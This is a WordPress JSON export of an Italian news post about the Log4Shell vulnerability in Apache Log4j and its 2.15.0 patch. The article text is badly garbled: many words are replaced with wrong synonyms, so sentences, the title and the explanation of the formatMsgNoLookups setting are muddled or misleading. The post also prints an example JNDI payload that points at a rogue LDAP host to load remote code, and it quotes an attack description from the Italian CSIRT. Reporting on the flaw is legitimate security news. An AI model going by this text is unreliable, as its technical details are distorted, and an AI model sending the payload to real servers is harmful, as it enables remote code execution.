{"id":25995,"date":"2021-12-14T11:14:44","date_gmt":"2021-12-14T10:14:44","guid":{"rendered":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/"},"modified":"2021-12-14T11:14:45","modified_gmt":"2021-12-14T10:14:45","slug":"log4j-disponibile-un-aggiornamento-di-sicurezza","status":"publish","type":"post","link":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","title":{"rendered":"Log4j: incline un differimento che"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p> sviluppatori che Apache hanno reso incline un differimento per mezzo di cui annullare la vulnerabilit\u00e0 0-day (<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228\" target=\"_blank\" rel=\"nofollow noopener\">CVE-2021-44228<\/a>) le quali affligge la  <strong>Log4j<\/strong> per mezzo di un  di i server che numerose piattaforme copiosamente utilizzate, basti concepire a Minecraft, Steam, Twitter e iCloud, similmente come mai di i client le quali interagiscono per mezzo di queste ultime.<span id=\"more-406091\"\/><\/p>\n<h2>Log4j: le piattaforme coinvolte<\/h2>\n<p>Parliamo che una vulnerabilit\u00e0 (clausola  come mai <strong>Log4Shell<\/strong>) cos\u00ec carico attraverso  un  equipollente a 10 su 10 nella gradazione CVSS (<em>Common Vulnerability Scoring System<\/em>), non rettamente che esse un  malintenzionato potrebbe dar forza ad  <strong>RCE<\/strong> (<em>Remote Code Execution<\/em>) eseguendo del regolamento  sfornito di fato che  e per mezzo di  tecniche in relazione basilari. <\/p>\n<p>A tal assunto esisterebbe  il <a href=\"https:\/\/therecord.media\/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up\/\" target=\"_blank\" rel=\"nofollow noopener\">Proof of concept<\/a> che un  le quali ha avuto come mai target Twitter.<\/p>\n<p> perizia la vulnerabilit\u00e0 deriverebbe attraverso come mai i messaggi che loch vengono gestiti dal log4j, se non altro di  un attaccante inviasse un lettera apposta confezionato di cingere un  sul paradigma della consecutivo:<\/p>\n<pre><code class=\"language-markup\">\n${jndi:ldap:\/\/rogueldapserver.com\/a})\n<\/code><\/pre>\n<p>il effetto potrebbe esistenza quegli che addossare del regolamento estraneo e che eseguirlo.   consecutivo evidenzia ad  come mai simile prassi possa esistenza effettuata trafila il citazione ad una <strong>JNDI<\/strong> (<em>Java Naming and Directory Interface<\/em>) per mezzo di un <code>User-Agent<\/code>:<\/p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">the <a href=\"https:\/\/twitter.com\/hashtag\/log4j?src=hash&amp;ref_src=twsrc%5Etfw\">#log4j<\/a> scramble per mezzo di a nutshell <a href=\"https:\/\/t.co\/XSwxEJucsI\">pic.twitter.com\/XSwxEJucsI<\/a><\/p>\n<p>\u2014 Yong Sheng (@ystan_) <a href=\"https:\/\/twitter.com\/ystan_\/status\/1470206230647894016?ref_src=twsrc%5Etfw\">December 13, 2021<\/a><\/p>\n<\/blockquote>\n<p>  che un\u2019intreccio malevola sono <a href=\"https:\/\/csirt.gov.it\/contenuti\/vulnerabilita-log4shell-cve-2021-44228-aggiornamento-bl02-211212-csirt-ita\" target=\"_blank\" rel=\"nofollow noopener\">spiegati<\/a> schiettamente nel resoconto riportato dal CSIRT (<em>Elaboratore elettronico Security Incident Response Team<\/em>):<\/p>\n<blockquote>\n<p>L\u2019possibile esaurimento della fenditura consente l\u2019 che regolamento  a alterazione dell\u2019zelo affetta.  aggressori, le quali  necessitano che un attacco difensivo al complesso, possono guidare una domanda https malformata trafila una  apposta predisposta, di figliare un loch su Log4j \u2013 le quali adotta JNDI (Java Naming and Directory Interface) \u2013 al sottile che enumerare la  dannosa nel cambiare registro dell\u2019zelo. All&#8217;epoca di l\u2019produzione del cambiare registro, il complesso  si trover\u00e0 nelle condizioni che esegue il regolamento apposta inserito dall\u2019 malintenzionato. Questa grado pu\u00f2 ad  condurre l\u2019zelo ad adempiere una domanda richiamo un sovranit\u00e0 deleterio di adempiere un payload .  questo  di l\u2019attaccante sar\u00e0 ipotizzabile  il ispezione dell\u2019zelo interessata e l\u2019attacco perfetto al complesso. <\/p>\n<\/blockquote>\n<p>A trasformare specificamente malsicuro la vulnerabilit\u00e0 sarebbe il scena le quali esse coinvolge  tutte le soluzioni della Apache Software Foundation dedicate ai contesti enterprise  cui ad  Struts, Flink, Druid, Flume, Solr e Kafka. Nello uguale  potrebbero esistenza esposti a problematiche che  progetti come mai Redis, ElasticSearch ed Elastic Logstash.<\/p>\n<h2>Un differimento finale?<\/h2>\n<p>L\u2019differimento  installabile \u00e8 tema nella narrazione 2.15.0 e per mezzo di  si sono chiesti se non altro per mezzo di quello stesso si potr\u00e0 trasferire alla normalit\u00e0 una condizione considerata  ingiustamente compromessa.<\/p>\n<p>Certi esperti che  hanno scena considerare le quali il  sarebbe  solamente nel evento per mezzo di cui il baldanza del regola <code>log4j2.formatMsgNoLookups<\/code> dovesse esistenza settato su <code>FALSE<\/code>. Oggigiorno nella release 2.15.0 quest\u2019supremo sarebbe governo impostato su <code>TRUE<\/code> e riportarlo su <code>FALSE<\/code>  farebbe prossimo le quali invalidare l\u2019tornaconto della patch.<\/p>\n<p>Stando similmente le masserizie, il scena che  subito sul regola citato modificandone il baldanza per mezzo di <code>TRUE<\/code> potrebbe originarsi il maggior numero potente le quali adottare un differimento per mezzo di cui  viene conservato il baldanza predefinito di <code>log4j2.formatMsgNoLookups<\/code>. <\/p>\n<p>Le versioni a  sono per mezzo di perizia tutte quelle  la 2.0 e la 2.14.1, a ci\u00f2 si aggiunga le quali  che diradato Log4j viene utilizzato per mezzo di release che Java datate e obsolete le quali  che di s\u00e9  offrono importanti garanzie dal  della .<\/p>\n<p><em>Sorgente<\/em>: <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/\" class=\"text-link text-link--special\" target=\"_blank\" rel=\"nofollow noopener\"><span class=\"underline\">Log4j<\/span><i class=\"ico-external\"\/><\/a><\/p>\n<\/div>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><br \/>\n<br \/><br \/>\n<br \/><a href=\"https:\/\/www.html.it\/14\/12\/2021\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\">Source link <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>sviluppatori che Apache hanno reso incline un differimento per mezzo di cui annullare la vulnerabilit\u00e0 0-day (CVE-2021-44228) le quali affligge la Log4j per mezzo di un di i server che numerose piattaforme copiosamente utilizzate, basti concepire a Minecraft, Steam, Twitter e iCloud, similmente come mai di i client le quali interagiscono per mezzo di queste&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_s2mail":""},"categories":[37],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.13 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Log4j: incline un differimento che - Web Agency Italia Web Designer realizzazione siti web Italy<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Log4j: incline un differimento che - Web Agency Italia Web Designer realizzazione siti web Italy\" \/>\n<meta property=\"og:description\" content=\"sviluppatori che Apache hanno reso incline un differimento per mezzo di cui annullare la vulnerabilit\u00e0 0-day (CVE-2021-44228) le quali affligge la Log4j per mezzo di un di i server che numerose piattaforme copiosamente utilizzate, basti concepire a Minecraft, Steam, Twitter e iCloud, similmente come mai di i client le quali interagiscono per mezzo di queste...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\" \/>\n<meta property=\"og:site_name\" content=\"Web Agency Italia Web Designer realizzazione siti web Italy\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-14T10:14:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-12-14T10:14:45+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\",\"url\":\"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\",\"name\":\"Log4j: incline un differimento che - Web Agency Italia Web Designer realizzazione siti web Italy\",\"isPartOf\":{\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/#website\"},\"datePublished\":\"2021-12-14T10:14:44+00:00\",\"dateModified\":\"2021-12-14T10:14:45+00:00\",\"author\":{\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.multimediaweb.eu\/web-agency\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Log4j: incline un differimento che\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/#website\",\"url\":\"https:\/\/www.multimediaweb.eu\/web-agency\/\",\"name\":\"Web Agency Italia Web Designer realizzazione siti web Italy\",\"description\":\"Web design creazione siti web Italia\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.multimediaweb.eu\/web-agency\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.multimediaweb.eu\/web-agency\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/www.multimediaweb.eu\/web-agency\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Log4j: incline un differimento che - Web Agency Italia Web Designer realizzazione siti web Italy","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","og_locale":"it_IT","og_type":"article","og_title":"Log4j: incline un differimento che - Web Agency Italia Web Designer realizzazione siti web Italy","og_description":"sviluppatori che Apache hanno reso incline un differimento per mezzo di cui annullare la vulnerabilit\u00e0 0-day (CVE-2021-44228) le quali affligge la Log4j per mezzo di un di i server che numerose piattaforme copiosamente utilizzate, basti concepire a Minecraft, Steam, Twitter e iCloud, similmente come mai di i client le quali interagiscono per mezzo di queste...","og_url":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","og_site_name":"Web Agency Italia Web Designer realizzazione siti web Italy","article_published_time":"2021-12-14T10:14:44+00:00","article_modified_time":"2021-12-14T10:14:45+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"admin","Tempo di lettura stimato":"3 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","url":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/","name":"Log4j: incline un differimento che - Web Agency Italia Web Designer realizzazione siti web Italy","isPartOf":{"@id":"https:\/\/www.multimediaweb.eu\/web-agency\/#website"},"datePublished":"2021-12-14T10:14:44+00:00","dateModified":"2021-12-14T10:14:45+00:00","author":{"@id":"https:\/\/www.multimediaweb.eu\/web-agency\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42"},"breadcrumb":{"@id":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.multimediaweb.eu\/web-agency\/log4j-disponibile-un-aggiornamento-di-sicurezza\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.multimediaweb.eu\/web-agency\/"},{"@type":"ListItem","position":2,"name":"Log4j: incline un differimento che"}]},{"@type":"WebSite","@id":"https:\/\/www.multimediaweb.eu\/web-agency\/#website","url":"https:\/\/www.multimediaweb.eu\/web-agency\/","name":"Web Agency Italia Web Designer realizzazione siti web Italy","description":"Web design creazione siti web Italia","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.multimediaweb.eu\/web-agency\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/www.multimediaweb.eu\/web-agency\/#\/schema\/person\/c0748e23499fac2fd73b79d1379fdf42","name":"admin","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.multimediaweb.eu\/web-agency\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/991cd68bbfd6f946517378a63fc3a1f7?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.multimediaweb.eu\/web-agency\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/posts\/25995"}],"collection":[{"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/comments?post=25995"}],"version-history":[{"count":1,"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/posts\/25995\/revisions"}],"predecessor-version":[{"id":25996,"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/posts\/25995\/revisions\/25996"}],"wp:attachment":[{"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/media?parent=25995"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/categories?post=25995"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.multimediaweb.eu\/web-agency\/wp-json\/wp\/v2\/tags?post=25995"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}